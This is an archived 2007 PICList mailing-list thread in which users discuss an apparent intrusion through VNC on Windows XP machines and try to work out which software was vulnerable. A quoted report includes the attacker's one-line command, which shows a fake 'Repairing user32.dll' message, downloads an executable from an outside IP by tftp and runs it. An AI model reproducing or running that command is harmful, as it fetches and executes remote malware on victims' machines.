On Fri, 2007-04-13 at 23:41 +1200, Russell McMahon wrote:
> > My pc (xp pro sp2) is usually on and connected, and I often use
> > tight-vnc, everything OK till I found this (see image)
> >
> > Someone executed this code: %comspec% /c echo Repairing user32.dll
> > echo Please wait... & tftp -i 64.79.213.12 GET
> > jijrtyw.exe & start jijrtyw&
> >
> > as a server address in 'TightVNC Viewer', appears an error message:
> > "Failed to get server address"
> >
> > but a cmd.exe window was open and that code was executed
>
> I'm trying to investigate this issue, but I do not understand yet how
> that could be possible.
>
> Do you have other VNC versions installed? Specifically, could it be
> possible that you run RealVNC's version 4.1.1?
>
> While searching the Internet, I was able to find a number of reports
> similar to this one (even the IP address was the same in many cases),
> but what was strange is that versions and distributions of VNC software
> were different in different reports - TightVNC, UltraVNC, VNC4.
>
> Another strange thing is that VNC viewer is involved, while VNC server
> is needed to connect to the machine. Are both server and viewer
> vulnerable? -- I think that's not likely. Looks very strange...

I saw the exact same thing on one of my machines a few weeks ago. The
only difference was that was the first time that machine was directly
connected to the internet (usually all my machines are behind a hardware
firewall).

Closing the VNC server resulted in not seeing it again. I wonder what it
is.

TTYL

--
http://www.piclist.com PIC/SX FAQ & list archive
View/change your membership options at
http://mailman.mit.edu/mailman/listinfo/piclist